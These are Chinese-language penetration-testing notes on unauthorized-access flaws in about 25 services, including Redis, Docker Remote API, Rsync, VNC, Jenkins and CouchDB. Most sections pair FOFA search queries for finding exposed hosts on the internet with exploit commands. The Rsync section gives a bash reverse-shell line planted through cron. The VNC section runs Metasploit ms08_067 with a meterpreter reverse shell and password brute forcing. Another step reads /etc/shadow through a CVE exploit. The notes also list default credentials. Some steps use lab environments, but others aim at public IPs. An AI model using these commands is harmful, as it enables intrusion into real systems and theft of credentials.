未授权访问漏洞

1.redis

#搭建靶场
cd /vulhub-master/redis/4-unacc
docker-compose up -d
docker ps
#kali安装redis服务
apt install redis
#连接redis
redis-cli -h IP -p 端口
#redis常见命令
（1）查看信息：info
（2）删除所有数据库内容：flushall
（3）刷新数据库：flushdb
（4）看所有键：KEYS *，使⽤select num可以查看键值数据。
（5）设置变量：set test "whoami"
（6）config set dir dirpath 设置路径等配置
（7）config get dir/dbfilename 获取路径及数据配置信息
（8）save保存
（9）get 变量，查看变量名称

连接工具

#可以直接连接执行命令且不需要认证说明存在未授权访问漏洞
git clone https://github.com/n0b0dyCN/redis-rogue-server

使用工具执行以下命令获取目标的命令执行环境

python3 redis-rogue-server.py --rhost 目标IP --lhost 本机IP

fofa查询port="6379"

被防火墙拦了

2.MongoDB

#搭建环境
docker pull mongo
docker run -d -p 27017:27017 --name mongodb mongo
docker ps -a

访问漏洞使用Navicat进行连接

3.Memcached

#Memcached程序下载
https://www.runoob.com/memcached/window-install-memcached.html
#执行命令
memcached.exe -d install
memcached.exe -d start
netstat -ano
#报错解决
错误:Failed to ignore SIGHUP: No error
schtasks /create /sc onstart /tn memcached /tr "'D:\浏览器下载\memcached-amd64\memcached.exe' -m 512
sc create "Memcached11211" binPath= "D:\浏览器下载\memcached-amd64\memcached.exe -d runservice -p 11211" DisplayName= "Memcached11211" start= auto

使用Telnet程序探测目标的11211端口

#Telnet探测
telnet 172.16.1.195 11211
#操作命令
stats //查看memcache服务状态
stats items //查看所有items
stats cachedump 39 0 //获得缓存key
get :state:264861539228401373:261588 //通过key读取相应value获得实际缓存内容，造
成敏感信息泄露

4.Zookeeper

#fofa语句
port="2181" && "Zookeeper" && country="US"
#在kali检测
echo envi | nc ip 端口
#可使用Zookeeper可视化管理工具进⾏连接
https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip

35.162.110.1:2181

5.Jenkins

#fofa语句
port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

println "命令" .execute().text

 

6.Jupyter NoteBook

#fofa语法
"Jupyter Notebook" && port="8888" && "terminals"
#vulhub靶场
cd /vulhub/jupyter/notebook-rce
docker-compose up -d

7.Elasticsearch

#fofa语句
"Elasticsearch" && port="9200"

8.Kibana

#fofa语句
"kibana" && port="5601"

9.Docker Remote API

#fofa语句
port="2375" && "docker"

#使用-H参数连接目标主机的docker，使用ps命令查询目标系统运行的镜像
docker -H tcp://IP:2375 ps
docker -H tcp://IP version
docker -H tcp://IP exec -it ID /bin/bash

10.Kubernetes Api Server

#fofa语句
port="8080" && app="Kubernetes"

11.Hadoop

#fofa语句
port="8088" && app="Hadoop"

12.ActiveMQ

#fofa语句
body="ActiveMQ" && port="8161"

目录admin
账号密码:admin

13.RabbitMQ

#fofa语句
port="15672" 
port="15692" 
port="25672"

账号密码:guest

14.Springboot Actuator

#fofa语句
icon_hash="116323821"

15.FTP(匿名登陆)

16.JBoss

#fofa语句
title="Welcome to JBoss"

17.Ldap

#Fofa语法
port="389"
#Ldapadmin工具
http://www.ldapadmin.org/download/index.html

步骤三：连接⽬标LDAP服务并查看其内容

18.Rsync

# Fofa语法
(port="873") && (is_honeypot=false && is_fraud=false)
# 启动靶场
cd vulhub/rsync/common
docker-compose up -d
# 读取文件执行命令
rsync rsync://IP:873/
rsync rsync://IP:873/src/

# 配置⽂件
motd file -> motd⽂件位置
log file -> ⽇志⽂件位置⽂件位置
path -> 默认路径位置路径位置
use chroot -> 是否限定在该⽬录下定在该⽬录下该⽬录下,如果为true就限定为模块默认⽬录
read only -> 只读配置
list=true -> 是否可以列出模块名以列出模块名出模块名
uid = root -> 传输使⽤的⽤户名
gid = root -> 传输使⽤的⽤户组
auth users -> 认证⽤户名
secrets file=/etc/rsyncd.passwd -> 指定密码⽂件密码⽂件,密码⽂件/etc/rsyncd.pa
sswd的内容格式为：username:password
hosts allow=192.168.0.101 -> 设置可以允许访问的主机
hosts deny 禁⽌的主机*表任意任意
# 基本命令
Rsync [-avrlptgoD] [-e ssh] [user@hostIP:/dir] [/local/path]
-v 观察模式，输出更多资讯
-q 与 –v 相反，仅显示错误信息
-r 递归复制，针对⽬录
-u 仅更新较新的⽂件
-l 复制连接的属性
-p 复制时保持属性不变
-g 保存原有群组
-o 保存原有拥有⼈
-D 保存原有装置属性
-t 保存原有时间属性
-I 忽略更新时间属性，档案⽐对较快
-z 加上压缩参数
-e 使⽤协议通道，例如ssh，-e ssh
-a 相对于-rlptgoD，所以-a最常⽤

漏洞描述：Rsync未授权访问带来的危害主要有两个：

1. 造成了严重的信息泄露；
2. 上传脚本后⻔⽂件，远程命令执⾏；

在fofa搜索

(port="873") && (is_honeypot=false && is_fraud=false)

启动靶场

cd vulhub/rsync/common
docker-compose up -d

执行命令

rsync rsync://8.155.7.133:873/src/

反弹shell：在此可利⽤定时任务cron来反弹获取shell

#查看定时任务
rsync rsync://8.155.7.133:873/src/etc/crontab
#安静定时文件下载下来
rsync rsync://8.155.7.133/src/etc/crontab /tmp/crontab.txt
#定时任务内容为，⼤致意思为每17分钟调⽤⼀次/etc/cron.hourly
cat /tmp/crontab.txt
#创建shell⽂件
/bin/bash -i >& /dev/tcp/8.155.7.133/8888 0>&1
#授权shell文件
chmod 777 shell
#上传shell至靶机
rsync -av ./shell rsync://8.155.7.133:873/src/etc/cron.hourly
#攻击机开启nc监听相应端⼝
nc -lvp 8888

19.VNC

步骤⼀：使⽤以下语句在Fofa上进⾏资产收集

(port="5900") && (is_honeypot=false && is_fraud=false)

步骤⼆：可通过MSF中的模块进⾏检测与漏洞利⽤

# VNC未授权检测
msf6 > use auxiliary/scanner/vnc/vnc_none_auth
msf6 auxiliary(scanner/vnc/vnc_none_auth) > show options
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set rhosts 172.16.1.1-254
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set threads 100
msf6 auxiliary(scanner/vnc/vnc_none_auth) > run
# VNC密码爆破
msf6 > use auxiliary/scanner/vnc/vnc_login
msf6 auxiliary(scanner/vnc/vnc_login) > set rhosts 172.16.1.200
msf6 auxiliary(scanner/vnc/vnc_login) > set blank_passwords true //弱密码爆
破
msf6 auxiliary(scanner/vnc/vnc_login) > run
# 加载攻击模块
msf6 exploit(windows/smb/ms08_067_netapi) > use exploit/windows/smb/ms08_0
67_netapi
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterprete
r/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 172.16.1.200
msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 172.16.1.10
msf6 exploit(windows/smb/ms08_067_netapi) > set target 34
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
获取会话后，直接run vnc可控制远程虚拟机
# 直接控制远程机器
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/vncinject/reverse_tcp
msf6 exploit(multi/handler) > set lhost 172.16.1.200
msf6 exploit(multi/handler) > set lport 4466
msf6 exploit(multi/handler) > exploit

步骤三：VNC链接验证

vncviewer ipaddress

20.Dubbo

步骤⼀：使⽤以下语句在Fofa上进⾏资产收集

(app="APACHE-dubbo") && (is_honeypot=false && is_fraud=false)

步骤⼆：使⽤Telnet程序直接进⾏链接测试

telent IP port

21.NSF共享⽬录

步骤⼀：使⽤以下语句在Fofa上进⾏资产收集

"nfs"

步骤⼆：执⾏命令进⾏漏洞复现

#安装nfs客户端
apt install nfs-common
#查看nfs服务器上的共享⽬录
showmount -e IP
#挂载相应共享⽬录到本地
mount -t nfs IP:/grdata /mnt
#卸载⽬录
umount /mnt

22.Druid

步骤⼀：使⽤以下语句在Fofa与Google上进⾏资产收集....

# Fofa
title="Druid Stat Index"
# PHPINFO⻚⾯
inurl:phpinfo.php intitle:phpinfo()
info.php test.php
 
# Druid未授权访问
inurl:"druid/index.html" intitle:"Druid Stat Index"

步骤⼆:对访问到的站点查看

步骤三：Druid批量扫描脚本...

https://github.com/MzzdToT/CVE-2021-34045

23.CouchDB

步骤⼀：使⽤以下语句在Fofa上进⾏资产收集....或开启Vulhub靶场进⾏操作

# 搜索语法
(port="5984") && (is_honeypot=false && is_fraud=false)
# Vulhub靶场
cd /vulhub/couchdb/CVE-2017-12636
docker-compose up -d

步骤⼆：执⾏未授权访问测试命令

curl 192.168.1.4:5984
curl 192.168.1.4:5984/_config

步骤三：反弹Shell参考

https://blog.youkuaiyun.com/qq_45746681/article/details/108933389

24.Altassian Crowd

步骤⼀：使⽤以下语句在Fofa上进⾏资产收集

(port="554") && (is_honeypot=false && is_fraud=false) && protocol="rtsp" 

步骤⼆：执行攻击命令并验证

python2 CVE-2019-11580.py http://192.168.116.132:8095/
curl http://192.168.116.132:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow

25.RTSP

(port="554") && (is_honeypot=false && is_fraud=false) && protocol="rtsp"

rtsp://admin:admin@192.168.1.1:554/cam/realmonitor?channel=2&subtype=1